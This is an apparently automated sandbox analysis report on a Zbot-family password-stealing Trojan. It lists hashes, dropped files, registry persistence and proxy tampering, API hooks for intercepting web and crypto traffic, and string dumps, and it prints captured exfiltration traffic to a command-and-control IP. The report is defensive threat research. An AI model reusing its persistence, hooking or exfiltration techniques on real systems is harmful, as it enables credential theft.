HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.GenericKD.1604712 (B) (Emsisoft), Trojan.GenericKD.1604712 (AdAware), Trojan-PSW.Win32.Zbot.4.FD, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan-PSW, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: ef5b3f90776d64055a927ff0980abedd
SHA1: d297e1dda2be39da75d6e2972dd51a6e9278aac7
SHA256: f8c826eda75e5d406fc6f06a13836d2b127dae4a2e91d8b4e862c8fd34a7e7b3
SSDeep: 192:0aWjyh/fBFJtS/liOhMwb5QRLjMR /vJ8vXkghW3USoQkC4duC8ffbQSEyw:YyheNitu2RLjpH9ghe91kCh0SE1
Size: 20636 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-01-27 22:38:07
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-PSW. Trojan program intended for stealing users passwords.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan-PSW creates the following process(es):
tasklist.exe:1716
reg.exe:272
attrib.exe:2092
driverquery.exe:3648
systeminfo.exe:3828
makecab.exe:3932
fmpal.exe:2112
uhahbe.exe:2180
pdf_updater.exe:2844
dmpal.exe:3388
The Trojan-PSW injects its code into the following process(es):
uhahbe.exe:1760
Explorer.EXE:1948
File activity
The process tasklist.exe:1716 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_1.tmp (119500 bytes)
The process reg.exe:272 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_1.tmp (3240059 bytes)
The process driverquery.exe:3648 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_1.tmp (416527 bytes)
The process systeminfo.exe:3828 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_1.tmp (352446 bytes)
The process makecab.exe:3932 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~2.tmp (124 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab3 (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab2 (4669 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab5 (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab4 (4669 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab6 (8 bytes)
The Trojan-PSW deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\cab11 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab3 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab2 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab5 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab4 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab7 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab6 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab9 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab8 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab10 (0 bytes)
The process fmpal.exe:2112 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\PVU5D3E.bat (173 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Iwibs\uhahbe.exe (3573 bytes)
The process uhahbe.exe:1760 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%System%\drivers\d46dd.sys (745 bytes)
%Documents and Settings%\%current user%\ntuser.dat.LOG (9960 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (8076 bytes)
The process pdf_updater.exe:2844 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\1203a[1].ton (1684 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\fmpal.exe (1781 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\13003UKp[1].ton (1760 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dmpal.exe (1733 bytes)
The process dmpal.exe:3388 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%WinDir%\client.dll (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\855375.cmd (105 bytes)
%WinDir%\aplib64.dll (12 bytes)
%WinDir%\aplib.dll (11 bytes)
%WinDir%\zlib1.dll (59 bytes)
The Trojan-PSW deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_1.tmp (0 bytes)
Registry activity
The process tasklist.exe:1716 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 B6 6D 06 47 95 10 9E F2 B0 EA 42 66 EE 8B 6E"
The process reg.exe:272 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 A9 44 F9 69 B7 10 82 1C 03 D0 FB 96 BB 76 61"
The process attrib.exe:2092 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 21 10 71 02 BB 73 93 80 2B C5 DA 75 CD D2 D1"
The process driverquery.exe:3648 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 2F 24 76 DD 70 1A A8 56 21 1C 09 CE A1 D4 4C"
The process systeminfo.exe:3828 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 C8 E3 93 E9 B3 4F 23 F8 96 73 12 B5 9D 4D 1F"
The process makecab.exe:3932 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 75 D5 97 10 86 69 BA 29 39 03 0F E8 DC 6C 9C"
The process fmpal.exe:2112 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 B4 58 F7 2E B7 18 59 90 B4 22 5B 73 D3 7B 32"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process uhahbe.exe:1760 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 02 8C F9 21 59 4C 58 77 BC 1A 7E BC BF 1B DA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Microsoft\Ugywyfo]
"28abe2je" = "iq70ApAFMC83GtWmy4TVKg==("
The process pdf_updater.exe:2844 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"dmpal.exe" = "dmpal"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"fmpal.exe" = "fmpal"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E 0C 7C B2 45 93 B3 DA E0 64 C4 BD B9 3D A6 6B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
The Trojan-PSW modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-PSW modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-PSW modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-PSW deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process dmpal.exe:3388 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3B F6 FA 70 EF DE 3F 0C 80 9C 79 CE 45 EF 6B 66"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 43 00 00 00 01 00 00 00 00 00 00 00"
The Trojan-PSW modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan-PSW modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan-PSW modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
To automatically run itself each time Windows is booted, the Trojan-PSW adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"dumpprov" = "rundll32 %WinDir%\client.dll,CreateProcessNotify"
The Trojan-PSW deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
02177948855c3cdf6a8e23d13160228f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\pdf_updater.exe |
7fe2b0b3fc2078130f20070a05daf8d5 | c:\WINDOWS\aplib.dll |
3f4fe60b6d1e05144f6efa098ac381a8 | c:\WINDOWS\aplib64.dll |
35c7b7eebe35bc4db0d01965b1193823 | c:\WINDOWS\client.dll |
80e41408f6d641dc1c0f5353a0cc8125 | c:\WINDOWS\zlib1.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using the driver "%System%\Drivers\b68915e210e9ddd0.sys" the Trojan-PSW controls loading executable images into a memory by installing the Load image notifier.
Using the driver "%System%\Drivers\b68915e210e9ddd0.sys" the Trojan-PSW controls operations with a system registry by installing the registry notifier.
The Trojan-PSW installs the following kernel-mode hooks:
ZwOpenProcess
ZwOpenThread
The Trojan-PSW installs the following user-mode hooks in WININET.dll:
HttpSendRequestExW
HttpSendRequestExA
InternetWriteFile
InternetReadFileExA
InternetReadFileExW
HttpSendRequestA
HttpSendRequestW
InternetQueryDataAvailable
HttpQueryInfoW
InternetCloseHandle
HttpQueryInfoA
InternetReadFile
The Trojan-PSW installs the following user-mode hooks in CRYPT32.dll:
PFXImportCertStore
The Trojan-PSW installs the following user-mode hooks in USER32.dll:
GetClipboardData
TranslateMessage
The Trojan-PSW installs the following user-mode hooks in Secur32.dll:
UnsealMessage
SealMessage
DeleteSecurityContext
The Trojan-PSW installs the following user-mode hooks in WS2_32.dll:
WSAGetOverlappedResult
WSASend
recv
gethostbyname
WSARecv
send
closesocket
freeaddrinfo
getaddrinfo
GetAddrInfoW
The Trojan-PSW installs the following user-mode hooks in ntdll.dll:
LdrLoadDll
NtCreateThread
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
tasklist.exe:1716
reg.exe:272
attrib.exe:2092
driverquery.exe:3648
systeminfo.exe:3828
makecab.exe:3932
fmpal.exe:2112
uhahbe.exe:2180
pdf_updater.exe:2844
dmpal.exe:3388 - Delete the original Trojan-PSW file.
- Delete or disinfect the following files created/modified by the Trojan-PSW:
%Documents and Settings%\%current user%\Local Settings\Temp\_1.tmp (119500 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~2.tmp (124 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab3 (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab2 (4669 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab5 (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab4 (4669 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab6 (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\PVU5D3E.bat (173 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Iwibs\uhahbe.exe (3573 bytes)
%System%\drivers\d46dd.sys (745 bytes)
%Documents and Settings%\%current user%\ntuser.dat.LOG (9960 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (8076 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\1203a[1].ton (1684 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\fmpal.exe (1781 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\13003UKp[1].ton (1760 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dmpal.exe (1733 bytes)
%WinDir%\client.dll (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\855375.cmd (105 bytes)
%WinDir%\aplib64.dll (12 bytes)
%WinDir%\aplib.dll (11 bytes)
%WinDir%\zlib1.dll (59 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"dumpprov" = "rundll32 %WinDir%\client.dll,CreateProcessNotify" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 2978 | 3072 | 4.12195 | 667b2e43928b7b4f7997d3771ee35279 |
.data | 8192 | 5048 | 5120 | 4.01903 | 3bb690ef3f51cc08743db079d31031df |
.rsrc | 16384 | 10872 | 11264 | 3.09276 | 4ade1c0dc38342fa47a24dd94bab4ec8 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://95.211.192.195/tasks?version=111&group=0313a&client=273076e36ee6390d08c77a91bceb4e55&computer=XP2&os=5.1&latency=0.0 | |
hxxp://95.211.192.195/data?version=1011&group=0313a&client=273076e36ee6390d08c77a91bceb4e55&computer=XP2&os=5.1&latency=0.0&type=8 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /tasks?version=111&group=0313a&client=273076e36ee6390d08c77a91bceb4e55&computer=XP2&os=5.1&latency=0.0 HTTP/1.1
User-Agent: Microsoft-CryptoAPI/6.1
Host: 95.211.192.195
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 30 Apr 2014 17:46:58 GMT
Content-Type: text/html; charset=utf8
Content-Length: 162
Connection: keep-alive
<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>....
POST /data?version=1011&group=0313a&client=273076e36ee6390d08c77a91bceb4e55&computer=XP2&os=5.1&latency=0.0&type=8 HTTP/1.1
User-Agent: Microsoft-CryptoAPI/6.1
Host: 95.211.192.195
Content-Length: 11642
Connection: Keep-Alive
Cache-Control: no-cache
MSCF....z-......,...................C........ .........D.. ._1.tmp...aW=...CK.]ms..r.|<........b. ....#Kr...yD'NO...$-.."yI.......H..l....d:.d.C....<.]@ s|t..%.y..O^.|u......*!...."./.M...s.......(.4..J.K.......zBE!n.?E~H...$.9[Eq@..J|.%.{./Wy..7.|..Y.{%......}.X..tD..K./N.....cQ.".=._.W...DY..0.4'.y.....ET.a....9Y...W.z........#pN..K2..q.i0...1..a.6...Ju...G...I&....d...Lz...TQ...}M...q..G....$.3r..BN....)z. ..*._tpe.*C......&A.(.../.g/.{`...vL.0~5..#...
...^y...F.|.pp.e|.
p.3..V{.]..UO.t/J....D......w.|.r.-....PYNT...fY.,....a...p..p...fkd......d .'...%!...0E....b..._..K 1...Lf.......^.n.E..3.,MK
..y......./...x....e.6..L}/~%.&.V....E.....p....l.N.?>.$...(.O.......m.x.qz.
. .{r..E.<F=..%z..y..z.M.#...0....$..h...NK...."...4\6...........b....v..^u....O....~..........}.I.7v.$.sQ.Y.{8."$.......A.f.7...p...>>..K/J6E[rs5..q~..9>.L.iR......p[.........5<jh|......j......Q.vd..:....hb;Z..6...`;b.Q...XdT,2*......EF.".b..Xd(...E.b..Xd(...E.b..Xd(.....EF.".a....hXd4,2......E.a.aXd....E.a.aXd....E.a.aXdt,2:......EF.".c.....Xdt,2:......E.."c`.1...Xd,2.......E.."cb.1...XdL,2&......E.."cb....XXd,,2.......E.."ca....XXdl,26......E.."cc.....Xdl,26~..^j.w.T.6....P...*z'@Eo..........w....@c..........=._UfRJ.u. }:..i....L.}.f%`.T1lL.K.g..c..u.S.
HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 30 Apr 2014 17:47:54 GMT
Content-Type: text/html; charset=utf8
Content-Length: 162
Connection: keep-alive
<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>......
Map
Strings from Dumps
uhahbe.exe_1760:
.text
.text
`.data
`.data
.idata
.idata
@.reloc
@.reloc
PSSSSSSh
PSSSSSSh
bcdedit.exe -set TESTSIGNING ON
bcdedit.exe -set TESTSIGNING ON
%s\drivers\%s.sys
%s\drivers\%s.sys
\\.\NtSecureSys
\\.\NtSecureSys
ntdll.dll
ntdll.dll
svchost.exe
svchost.exe
EUDC\%d
EUDC\%d
KeDelayExecutionThread
KeDelayExecutionThread
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegCreateKeyExA
RegCreateKeyExA
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
msvcrt.dll
msvcrt.dll
Invalid parameter passed to C runtime function.
Invalid parameter passed to C runtime function.
0123456789
0123456789
:$:,:4:<</pre><pre>cRt.1</pre><pre>@[.cZ</pre><pre>http://www.google.com/</pre><pre>http://www.bing.com/</pre><pre>REPORT</pre><pre>bcdfghjklmnpqrstvwxzRegDeleteKeyExW</pre><pre>HTTP/1.1</pre><pre>userenv.dll</pre><pre>del "%s"</pre><pre>if exist "%s" goto d</pre><pre>del /F "%s"</pre><pre>gdiplus.dll</pre><pre>GdiplusShutdown</pre><pre>%3<8645=</pre><pre>7! *.gagZce{(#--2{}s %%;wdX</pre><pre>6019>6*//</pre><pre>0*18 2$4</pre><pre>! <47.ggt?45</pre><pre>L$Â$</pre><pre>w%fkN</pre><pre>m9.td</pre><pre>t.Ht$HHt</pre><pre>zcÁ</pre><pre>GetKeyboardState</pre><pre>MsgWaitForMultipleObjects</pre><pre>RegCreateKeyExW</pre><pre>RegQueryInfoKeyW</pre><pre>RegDeleteKeyW</pre><pre>RegOpenKeyExW</pre><pre>RegEnumKeyExW</pre><pre>CryptGetKeyParam</pre><pre>CryptImportKey</pre><pre>CryptDestroyKey</pre><pre>PathIsURLW</pre><pre>UrlUnescapeA</pre><pre>SHLWAPI.dll</pre><pre>ShellExecuteW</pre><pre>Secur32.dll</pre><pre>ole32.dll</pre><pre>WS2_32.dll</pre><pre>CertDeleteCertificateFromStore</pre><pre>CertOpenSystemStoreW</pre><pre>CertCloseStore</pre><pre>CertEnumCertificatesInStore</pre><pre>CertDuplicateCertificateContext</pre><pre>PFXExportCertStoreEx</pre><pre>PFXImportCertStore</pre><pre>CRYPT32.dll</pre><pre>HttpSendRequestExA</pre><pre>HttpQueryInfoA</pre><pre>InternetCrackUrlA</pre><pre>HttpOpenRequestA</pre><pre>HttpEndRequestA</pre><pre>HttpAddRequestHeadersA</pre><pre>WININET.dll</pre><pre>OLEAUT32.dll</pre><pre>NETAPI32.dll</pre><pre>IPHLPAPI.DLL</pre><pre>VERSION.dll</pre><pre>6f6F6S6b6l6</pre><pre>2#3(3]3{3</pre><pre>0 0,000<0@0\0`0</pre><pre>urlmon.dll</pre><pre>kernel32.dll</pre><pre>\StringFileInfo\xx\%s</pre><pre>Wadvapi32.dll</pre><pre>cabinet.dll</pre><pre>rapport</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s</pre><pre>launchpadshell.exe</pre><pre>dirclt32.exe</pre><pre>wtng.exe</pre><pre>prologue.exe</pre><pre>pcsws.exe</pre><pre>fdmaster.exe</pre><pre>D"%s"</pre><pre>"%s" %s</pre><pre>/c "%s"</pre><pre>E.tmp</pre><pre>shell32.dll</pre><pre>%Documents and Settings%\%current user%\Local Settings\Temp</pre><pre>%Documents and Settings%\%current user%\Local Settings\Application Data</pre><pre>Global\{01E22063-0823-4088-6532-C4CE7D78E7DC}</pre><b>uhahbe.exe_1760_rwx_00401000_0006D000:</b><pre>PSSSSSSh</pre><pre>bcdedit.exe -set TESTSIGNING ON</pre><pre>%s\drivers\%s.sys</pre><pre>\\.\NtSecureSys</pre><pre>ntdll.dll</pre><pre>svchost.exe</pre><pre>EUDC\%d</pre><pre>KeDelayExecutionThread</pre><pre>WinExec</pre><pre>KERNEL32.dll</pre><pre>ExitWindowsEx</pre><pre>USER32.dll</pre><pre>GDI32.dll</pre><pre>RegCloseKey</pre><pre>RegFlushKey</pre><pre>RegCreateKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>msvcrt.dll</pre><pre>Invalid parameter passed to C runtime function.</pre><pre>0123456789</pre><pre>:$:,:4:<</pre><pre>cRt.1</pre><pre>@[.cZ</pre><pre>http://www.google.com/</pre><pre>http://www.bing.com/</pre><pre>REPORT</pre><pre>bcdfghjklmnpqrstvwxzRegDeleteKeyExW</pre><pre>HTTP/1.1</pre><pre>userenv.dll</pre><pre>del "%s"</pre><pre>if exist "%s" goto d</pre><pre>del /F "%s"</pre><pre>gdiplus.dll</pre><pre>GdiplusShutdown</pre><pre>%3<8645=</pre><pre>7! *.gagZce{(#--2{}s %%;wdX</pre><pre>6019>6*//</pre><pre>0*18 2$4</pre><pre>! <47.ggt?45</pre><pre>L$Â$</pre><pre>w%fkN</pre><pre>m9.td</pre><pre>t.Ht$HHt</pre><pre>zcÁ</pre><pre>GetKeyboardState</pre><pre>MsgWaitForMultipleObjects</pre><pre>RegCreateKeyExW</pre><pre>RegQueryInfoKeyW</pre><pre>RegDeleteKeyW</pre><pre>RegOpenKeyExW</pre><pre>RegEnumKeyExW</pre><pre>CryptGetKeyParam</pre><pre>CryptImportKey</pre><pre>CryptDestroyKey</pre><pre>PathIsURLW</pre><pre>UrlUnescapeA</pre><pre>SHLWAPI.dll</pre><pre>ShellExecuteW</pre><pre>Secur32.dll</pre><pre>ole32.dll</pre><pre>WS2_32.dll</pre><pre>CertDeleteCertificateFromStore</pre><pre>CertOpenSystemStoreW</pre><pre>CertCloseStore</pre><pre>CertEnumCertificatesInStore</pre><pre>CertDuplicateCertificateContext</pre><pre>PFXExportCertStoreEx</pre><pre>PFXImportCertStore</pre><pre>CRYPT32.dll</pre><pre>HttpSendRequestExA</pre><pre>HttpQueryInfoA</pre><pre>InternetCrackUrlA</pre><pre>HttpOpenRequestA</pre><pre>HttpEndRequestA</pre><pre>HttpAddRequestHeadersA</pre><pre>WININET.dll</pre><pre>OLEAUT32.dll</pre><pre>NETAPI32.dll</pre><pre>IPHLPAPI.DLL</pre><pre>VERSION.dll</pre><pre>6f6F6S6b6l6</pre><pre>2#3(3]3{3</pre><pre>0 0,000<0@0\0`0</pre><pre>urlmon.dll</pre><pre>kernel32.dll</pre><pre>\StringFileInfo\xx\%s</pre><pre>Wadvapi32.dll</pre><pre>cabinet.dll</pre><pre>rapport</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s</pre><pre>launchpadshell.exe</pre><pre>dirclt32.exe</pre><pre>wtng.exe</pre><pre>prologue.exe</pre><pre>pcsws.exe</pre><pre>fdmaster.exe</pre><pre>D"%s"</pre><pre>"%s" %s</pre><pre>/c "%s"</pre><pre>E.tmp</pre><pre>shell32.dll</pre><pre>%Documents and Settings%\%current user%\Local Settings\Temp</pre><pre>%Documents and Settings%\%current user%\Local Settings\Application Data</pre><pre>Global\{01E22063-0823-4088-6532-C4CE7D78E7DC}</pre><b>uhahbe.exe_1760_rwx_00BD0000_00006000:</b><pre>PSSSSSSh</pre><pre>bcdedit.exe -set TESTSIGNING 